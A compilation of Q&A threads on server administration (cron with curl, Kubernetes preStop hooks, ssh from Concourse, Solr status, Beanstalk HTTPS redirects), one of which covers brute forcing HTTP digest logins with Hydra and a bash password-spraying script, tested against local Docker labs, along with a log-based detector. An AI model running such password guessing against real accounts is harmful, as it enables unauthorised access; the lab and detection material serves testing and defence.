How to set up cron using curl command? - perl

After apache rebuilt my cron jobs stopped working.
I used the following command:
wget -O - -q -t 1 http://example.com/cgi-bin/loki/autobonus.pl
Now my DC support suggests that I change the wget method to curl. What would be the correct value in this case?

-O - is equivalent to curl's default behavior, so that's easy.
-q is curl's -s (or --silent)
--retry N will substitute for wget's -t N
All in all:
curl -s --retry 1 http://example.com/cgi-bin/loki/autobonus.pl

Try running the command with the full path of wget:
/usr/bin/wget -O - -q -t 1 http://example.com/cgi-bin/loki/autobonus.pl
You can find the full path with:
which wget
Also, check whether you can reach the destination domain with ping or other methods:
ping example.com
Update:
based on the comments, seems to be caused by the line in /etc/hosts:
127.0.0.1 example.com #change example.com to the real domain

It seems that you have restricted options in terms that on the server where the cron should run you have the domain pinned to 127.0.0.1 but the virtual host configuration does not work with that.
What you can do is to let wget connect by IP but send the Host header so that the virtual host matching would work:
wget -O - -q -t 1 --header 'Host: example.com' http://xx.xx.35.162/cgi-bin/loki/autobonus.pl
Update
Also probably you don't need to run this over the web server, so why not just run:
perl /path/to/your/script/autobonus.pl

Brute forcing http digest with Hydra

I am having some trouble brute forcing a HTTP digest form with Hydra. I am using the following command; however, when proxied through Burp Suite I can see Hydra is using basic auth and not digest.
How do I get hydra to use the proper auth type?
Command:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -vV http-get /digest
Request as seen in proxy:
GET /digest HTTP/1.1
Host: 127.0.0.1
Connection: close
Authorization: Basic YWRtaW46aWxvdmV5b3U=
User-Agent: Mozilla/4.0 (Hydra)
I have studied this case, if the digest method is implemented on Nginx or apache servers level, hydra might work. But if the authentication is implemented on the application server like Flask, Expressjs, Django, it will not work at all
You can create a bash script for password spraying
#!/bin/bash
cat $1 | while read USER; do
    cat $2 | while read PASSWORD; do
        if curl -s $3 -c /tmp/cookie --digest -u $USER:$PASSWORD | grep -qi "unauth"
        then
            continue
        else
            echo [+] Found $USER:$PASSWORD
            exit 0
        fi
    done
done
Save this file as app.sh
$ chmod +x app.sh
$ ./app.sh /path/to/users.txt /path/to/passwords.txt http://example.com/path
Since no Hydra version was specified, I assume the latest one: 9.2.
@tbhaxor is correct:
Against a server like Apache or nginx Hydra works. Flask using digest authentication as recommended in the standard documentation does not work (details later). You could add the used web server so somebody can verify this.
Hydra does not provide explicit parameters to distinguish between basic and digest authentication.
Technically, it first sends a request that attempts to authenticate itself via basic authentication. After that it evaluates the corresponding response.
The specification of digest authentication states that the web application has to send a header WWW-Authenticate: Digest ... in the response if the requested document is protected using the scheme.
So Hydra now can distinguish between the two forms of authentication.
If it receives this response (cf. code), it sends a second attempt using digest authentication.
The reason why you only can see basic auth and not digest requests is due to the default setting of what Hydra calls "tasks". This is set to 16 by default, which means it initially creates 16 threads.
Thus, if you go to the 17th request in your proxy you will find a request using digest auth. You can also see the difference if you set the number of tasks to 1 with the parameter -t 1.
The following are 3 Docker setups where you can test the differences in basic auth (nginx), digest auth (nginx) and digest auth (Flask) using "admin/password" credentials based upon your example:
basic auth:
cat Dockerfile.http_basic_auth
FROM nginx:1.21.3
LABEL maintainer="secf00tprint"
RUN apt-get update && apt-get install -y apache2-utils
RUN touch /usr/share/nginx/html/.htpasswd
RUN htpasswd -db /usr/share/nginx/html/.htpasswd admin password
RUN sed -i '/^ location \/ {/a \ auth_basic "Administrator\x27s Area";\n\ auth_basic_user_file /usr/share/nginx/html/.htpasswd;' /etc/nginx/conf.d/default.conf
:
sudo docker build -f Dockerfile.http_basic_auth -t http-server-basic-auth .
sudo docker run -ti -p 127.0.0.1:8888:80 http-server-basic-auth
:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 8888 http-get /
digest auth (nginx):
cat Dockerfile.http_digest
FROM ubuntu:20.10
LABEL maintainer="secf00tprint"
RUN apt-get update && \
# For digest module
DEBIAN_FRONTEND=noninteractive apt-get install -y curl unzip \
# For nginx
build-essential libpcre3 libpcre3-dev zlib1g zlib1g-dev libssl-dev libgd-dev libxml2 libxml2-dev uuid-dev make apache2-utils expect
RUN curl -O https://nginx.org/download/nginx-1.21.3.tar.gz
RUN curl -OL https://github.com/atomx/nginx-http-auth-digest/archive/refs/tags/v1.0.0.zip
RUN tar -xvzf nginx-1.21.3.tar.gz
RUN unzip v1.0.0.zip
RUN cd nginx-1.21.3 && \
./configure --prefix=/usr/share/nginx --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/etc/nginx/modules --add-module=../nginx-http-auth-digest-1.0.0/ && \
make && make install
COPY generate.exp /usr/share/nginx/html/
RUN chmod u+x /usr/share/nginx/html/generate.exp && \
cd /usr/share/nginx/html/ && \
expect -d generate.exp
RUN sed -i '/^ location \/ {/a \ auth_digest "this is not for you";' /etc/nginx/nginx.conf
RUN sed -i '/^ location \/ {/i \ auth_digest_user_file /usr/share/nginx/html/passwd.digest;' /etc/nginx/nginx.conf
CMD nginx && tail -f /var/log/nginx/access.log -f /var/log/nginx/error.log
:
cat generate.exp
#!/usr/bin/expect
set timeout 70
spawn "/usr/bin/htdigest" "-c" "passwd.digest" "this is not for you" "admin"
expect "New password: " {send "password\r"}
expect "Re-type new password: " {send "password\r"}
wait
:
sudo docker build -f Dockerfile.http_digest -t http_digest .
sudo docker run -ti -p 127.0.0.1:8888:80 http_digest
:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 8888 http-get /
digest auth (Flask):
cat Dockerfile.http_digest_flask
FROM ubuntu:20.10
LABEL maintainer="secf00tprint"
RUN apt-get update -y && \
apt-get install -y python3-pip python3-dev
# We copy just the requirements.txt first to leverage Docker cache
COPY ./requirements.txt /app/requirements.txt
WORKDIR /app
RUN pip3 install -r requirements.txt
COPY ./app.py /app/
CMD ["flask", "run", "--host=0.0.0.0"]
:
cat requirements.txt
Flask==2.0.2
Flask-HTTPAuth==4.5.0
:
cat app.py
from flask import Flask
from flask_httpauth import HTTPDigestAuth
app = Flask(__name__)
app.secret_key = 'super secret key'
auth = HTTPDigestAuth()
users = {
    "admin": "password",
    "john": "hello",
    "susan": "bye"
}
# Return the stored password for a known user, None otherwise
@auth.get_password
def get_pw(username):
    if username in users:
        return users.get(username)
    return None
# Protect the root route with digest authentication
@app.route("/")
@auth.login_required
def hello_world():
    return "<p>Flask Digest Demo</p>"
:
sudo docker build -f Dockerfile.http_digest_flask -t digest_flask .
sudo docker run -ti -p 127.0.0.1:5000:5000 digest_flask
:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 5000 http-get /
If you want to see more information I wrote about it in more detail here.
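As an added example (not part of the original answer, and not Hydra's or nginx's code): the behaviour described above means a guessing run shows up in the server's access log as a burst of 401 responses from one client, often carrying the User-Agent `Mozilla/4.0 (Hydra)` seen in the question. The sketch below flags that pattern in nginx combined-format log lines; the sample lines, addresses, threshold and window are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# nginx "combined" access-log format
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

def parse(line):
    """Return (ip, timestamp, status, user_agent), or None if the line does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, int(m["status"]), m["ua"]

def detect_guessing(lines, threshold=10, window=timedelta(seconds=10)):
    """Flag clients with >= threshold 401s inside a sliding window, or a Hydra User-Agent.

    A legitimate digest client also receives one 401 (the challenge) before it
    can answer, so a single 401 must not alert; the threshold is an assumption to tune.
    """
    recent = defaultdict(deque)  # ip -> timestamps of its recent 401 responses
    stats = defaultdict(lambda: {"peak_401": 0, "hydra_ua": False})
    for line in lines:
        parsed = parse(line)
        if parsed is None:
            continue
        ip, ts, status, ua = parsed
        if status != 401:
            continue
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        stats[ip]["peak_401"] = max(stats[ip]["peak_401"], len(q))
        # The User-Agent is trivially changed, so it only supplements the rate check.
        stats[ip]["hydra_ua"] |= "(Hydra)" in ua
    return {ip: s for ip, s in stats.items()
            if s["peak_401"] >= threshold or s["hydra_ua"]}

# Constructed sample log lines (documentation addresses, not real traffic).
def _line(ip, sec, status, ua):
    return (f'{ip} - - [10/Oct/2021:13:55:{sec:02d} +0000] '
            f'"GET / HTTP/1.1" {status} 179 "-" "{ua}"')

SAMPLE = (
    [_line("203.0.113.5", s, 401, "Mozilla/4.0 (Hydra)") for s in range(4) for _ in range(5)]
    + [_line("198.51.100.7", 1, 401, "Mozilla/5.0"), _line("198.51.100.7", 1, 200, "Mozilla/5.0")]
    + [_line("192.0.2.9", s, 401, "curl/7.68.0") for s in range(10, 22)]
)

if __name__ == "__main__":
    for ip, s in detect_guessing(SAMPLE).items():
        print(ip, s)
```

The browser at 198.51.100.7 is not flagged: its single 401 is the normal digest challenge, followed by a 200.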

what is the valid http request that can be used within a prestop hook?

According to the below documentation, the line "HTTP - Executes an HTTP request against a specific endpoint on the Container."
https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/#hook-handler-implementations
Using preStop hook, I tried to curl to run the following script but it returns nothing. Is the prestop hook limited to use the Http request within the container i.e, localhost?
echo "test curl" > /proc/1/fd/1
echo $(curl -s /dev/null http://google.com) > /proc/1/fd/1
echo $(curl -s -o /dev/null -w "%{http_code}" http://google.com) > /proc/1/fd/1
No, as far as I know you are not limited to using preStop's httpGet only within the container. Your container should just have access to the requested URL, etc. So in your case you should have access to Google.
May I know what exactly you want to achieve? Are you trying to redirect curl output to the process with PID 1?
Your command works perfectly in containers (that have curl itself) when I specify a redirect to STDOUT, I mean /proc/self/fd/1
kubectl exec -ti curl -- bash
root@curl:/# echo $(curl -s -o /dev/null -w "%{http_code}" http://google.com) > /proc/self/fd/1
301
Btw, you can use exec instead of httpGet in preStop, where you can combine echo and curl
Yaml will be similar to
lifecycle:
  preStop:
    exec:
      # exec does not run a shell, so the redirect needs an explicit sh -c
      command: ["/bin/sh", "-c", "curl -XPOST -s http://google.com > /proc/1/fd/1"]
Please play with the command and adjust it for your needs. I haven't tested it; I wrote it on the fly.

How do I send a command to a remote system via ssh with concourse

I have the need to start a java rest server with concourse that lives on an Ubuntu 18.04 machine. The version of concourse my company uses is 5.5.11. The server code is written in Java, so a simple java -jar <uber.jar> suffices from the command line (see below). In production, I will not have this simple luxury, hence my question.
I have an scp command working that copies the .jar from concourse to the target Ubuntu machine:
scp -i /tmp/key.p8 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null ./${NEW_DIR}/${ARTIFACT_NAME}.${ARTIFACT_FILE_TYPE} ${SRV_ACCOUNT_USER}@${JAVA_VM_HOST}:/var/www
Note that my private key is passed with -i and I can confirm that is working.
I followed this other SO Q&A that seemed to be promising: Getting ssh to execute a command in the background on target machine, but after trying a few permutations of the suggested solution and other answers, I still don't have my rest service kicked off.
I've tried a few permutations of this line in my concourse script:
ssh -f -i /tmp/pvt_key1.p8 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null ${SRV_ACCOUNT_USER}@${JAVA_VM_HOST} "bash -c 'nohup java -jar /var/www/${ARTIFACT_NAME}.${ARTIFACT_FILE_TYPE} -c \"/opt/testcerts/clientkeystore\" -w \"password\" > /dev/null 2>&1 &'"
I've tried with and without the -f and -t switches in ssh, with and without the file stream redirection, with and without nohup and the Linux background ('&') command and various ways to escape the quotes.
At the bash prompt, this line successfully starts my server. The two switches are needed to point to the certificate and provide the password:
java -jar rest-service.jar -c "/opt/certificates/clientkeystore" -w "password"
I really think this is possible to do in Concourse, but I'm stuck at this point.
After a lot of trial and error, it seems I needed to do this:
ssh -f -i /tmp/pvt_key1.p8 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null ${SRV_ACCOUNT_USER}@${JAVA_VM_HOST} "bash -c 'sudo java -jar /var/www/${ARTIFACT_NAME}.${ARTIFACT_FILE_TYPE} -c \"/path/to/my/certificate\" -w \"password\" > /var/www/log.txt 2>&1 &'"
The key was I was missing the 'sudo' portion of the command. Using nohup as opposed to putting in a Linux bash background indicator ('&') seems to give me an error in the pipeline. This works for me, but others are welcome to post responses with better answers or methods that might be a better practice.

How to confirm Solr is running from the command line?

We have a few servers that are going to be rebooted soon and I may have to restart Apache Solr manually.
How can I verify (from the command line) that Solr is running?
The proper way is to use Solr's STATUS command. You could parse its XML response, but as long as it returns something to you with an HTTP status of 200, it should be safe to assume it's running. You can perform an HTTP HEAD request using curl with:
curl -s -o /dev/null -I -w '%{http_code}' http://example.com:8983/solr/admin/cores?action=STATUS
NOTE: Also, you can add a -m <seconds> to the command to only wait so many seconds for a response.
This will make a request to the Solr admin interface, and print out 200 on success which can be used from a bash script such as:
RESULT=$(curl -s -o /dev/null -I -w '%{http_code}' 'http://example.com:8983/solr/admin/cores?action=STATUS')
if [ "$RESULT" -eq 200 ]; then
    # Solr is running...
    echo "Solr is running"
else
    # Solr is not running...
    echo "Solr is not running"
fi
If you are on the same machine where Solr is running then this is my favourite:
$> solr status

How to set up Beanstalk + Nginx to redirect http to https?

My domain is pointing to a Beanstalk app (DNS ALIAS).
I have already set up SSL certificates properly on my Beanstalk instance.
So now:
http://www.mysite.com -> Beanstalk app with http
https://www.mysite.com -> Beanstalk app with https
I would like to redirect all http requests to https. So http://www.mysite.com -> https://www.mysite.com
I already tried to create an AWS container to implement something like "server { listen 80; return 301 https://www.mysite.com/$request_uri;}" but it is not working.
I have already spent several hours on Google trying to find some guidance on how to do that. I found some clues such as the 301 redirect, rewrite... but I am not being able to apply any solution to my Beanstalk EC2 instance.
Perhaps I need a more detailed explanation on how to do that.
Could someone help me, please?
PS: one thing that I am struggling to understand is the fact that the Load Balancer says that Load Balancer Port 80 is pointing to Instance Port 80 and Load Balancer Port 443 (HTTPS) is also pointing to Instance Port 80, but with Cipher/SSL cert.
Well, when I examine the nginx configuration files on my EC2 instance I only find a "server { listen 8080", not "listen 80".
Thank you all.
I've found this solution online.
Add .ebextensions/00_nginx_https_rw.config
files:
  "/tmp/45_nginx_https_rw.sh":
    owner: root
    group: root
    mode: "000644"
    content: |
      #! /bin/bash
      CONFIGURED=`grep -c "return 301 https" /etc/nginx/conf.d/00_elastic_beanstalk_proxy.conf`
      if [ $CONFIGURED = 0 ]
      then
        sed -i '/listen 8080;/a \ if ($http_x_forwarded_proto = "http") { return 301 https://$host$request_uri; } \n' /etc/nginx/conf.d/00_elastic_beanstalk_proxy.conf
        logger -t nginx_rw "https rewrite rules added"
        exit 0
      else
        logger -t nginx_rw "https rewrite rules already set"
        exit 0
      fi
container_commands:
  00_appdeploy_rewrite_hook:
    command: cp -v /tmp/45_nginx_https_rw.sh /opt/elasticbeanstalk/hooks/appdeploy/enact
  01_configdeploy_rewrite_hook:
    command: cp -v /tmp/45_nginx_https_rw.sh /opt/elasticbeanstalk/hooks/configdeploy/enact
  02_rewrite_hook_perms:
    command: chmod 755 /opt/elasticbeanstalk/hooks/appdeploy/enact/45_nginx_https_rw.sh /opt/elasticbeanstalk/hooks/configdeploy/enact/45_nginx_https_rw.sh
  03_rewrite_hook_ownership:
    command: chown root:users /opt/elasticbeanstalk/hooks/appdeploy/enact/45_nginx_https_rw.sh /opt/elasticbeanstalk/hooks/configdeploy/enact/45_nginx_https_rw.sh
Based on the code above, this is the code that I used to redirect the http requests to https for a standalone (i.e. not behind a load balancer) Docker image:
files:
  "/tmp/000_nginx_https_redirect.sh":
    owner: root
    group: root
    mode: "000644"
    content: |
      #!/bin/bash
      sed -i 's/80;/80;\n return 301 https:\/\/$http_host$request_uri;\n/' /etc/nginx/sites-available/elasticbeanstalk-nginx-docker-proxy.conf
container_commands:
  00_appdeploy_rewrite_hook:
    command: cp -v /tmp/000_nginx_https_redirect.sh /opt/elasticbeanstalk/hooks/appdeploy/enact
  01_configdeploy_rewrite_hook:
    command: cp -v /tmp/000_nginx_https_redirect.sh /opt/elasticbeanstalk/hooks/configdeploy/enact
  02_rewrite_hook_perms:
    command: chmod 755 /opt/elasticbeanstalk/hooks/appdeploy/enact/000_nginx_https_redirect.sh /opt/elasticbeanstalk/hooks/configdeploy/enact/000_nginx_https_redirect.sh
  03_rewrite_hook_ownership:
    command: chown root:users /opt/elasticbeanstalk/hooks/appdeploy/enact/000_nginx_https_redirect.sh /opt/elasticbeanstalk/hooks/configdeploy/enact/000_nginx_https_redirect.sh
For those, who don't use the Load Balancer, the if block from user3888643's answer wouldn't work. So I've removed it completely (not sure if this solution has any problems) and it works for me:
sed -i '/listen 8080;/a \ if ($http_x_forwarded_proto = "http") { return 301 https://$host$request_uri; }\n' /etc/nginx/conf.d/00_elastic_beanstalk_proxy.conf
to:
sed -i '/listen 8080;/a \ return 301 https://$host$request_uri;\n' /etc/nginx/conf.d/00_elastic_beanstalk_proxy.conf
I wasn't sure if user3888643's answer was still the correct one, since aws updated the way some of their own setup scripts run on elastic beanstalk earlier this year, but I just checked with aws support, this is still the advised solution. Add a file to .ebextensions, e.g .ebextensions/00_nginx_https_rw.config with the following contents
files:
  "/tmp/45_nginx_https_rw.sh":
    owner: root
    group: root
    mode: "000644"
    content: |
      #!/usr/bin/env bash
      CONFIGURED=`grep -c "return 301 https" /opt/elasticbeanstalk/support/conf/webapp.conf`
      if [ $CONFIGURED = 0 ]
      then
        sed -i '/ location \/ {/a \ if ($http_x_forwarded_proto = "http") { \n return 301 https://$host$request_uri;\n }' /opt/elasticbeanstalk/support/conf/webapp.conf
        logger -t nginx_rw "https rewrite rules added"
        exit 0
      else
        logger -t nginx_rw "https rewrite rules already set"
        exit 0
      fi
container_commands:
  00_appdeploy_rewrite_hook:
    command: cp -v /tmp/45_nginx_https_rw.sh /opt/elasticbeanstalk/hooks/appdeploy/enact
  01_configdeploy_rewrite_hook:
    command: cp -v /tmp/45_nginx_https_rw.sh /opt/elasticbeanstalk/hooks/configdeploy/enact
  02_rewrite_hook_perms:
    command: chmod 755 /opt/elasticbeanstalk/hooks/appdeploy/enact/45_nginx_https_rw.sh /opt/elasticbeanstalk/hooks/configdeploy/enact/45_nginx_https_rw.sh
  03_rewrite_hook_ownership:
    command: chown root:users /opt/elasticbeanstalk/hooks/appdeploy/enact/45_nginx_https_rw.sh /opt/elasticbeanstalk/hooks/configdeploy/enact/45_nginx_https_rw.sh
  04_reload_nginx:
    command: /etc/init.d/nginx reload
One thing to look out for: I found I couldn't deploy this because of an interaction with a previous (incorrect) version of the file in .ebextensions. There would be an error and the deployment would fail, even though the file was no longer in the repo being deployed:
[Instance: i-0c767ece] Command failed on instance.
Return code: 6
Output: nginx: [warn] duplicate MIME type "text/html" in /etc/nginx/nginx.conf:38 nginx:
[emerg] unknown directive "...." in /etc/nginx/conf.d/000_config.conf:4
nginx: configuration file /etc/nginx/nginx.conf test failed.
container_command 04_reload_nginx in .ebextensions/ssl_redirect.config failed.
For more detail, check /var/log/eb-activity.log using console or EB CLI.
It looks like each instance still had a copy of the previously deployed file in /etc/nginx/conf.d/, so I had to go into each instance and delete my previous config files in /etc/nginx/conf.d. Once I did that, the deployment went through fine.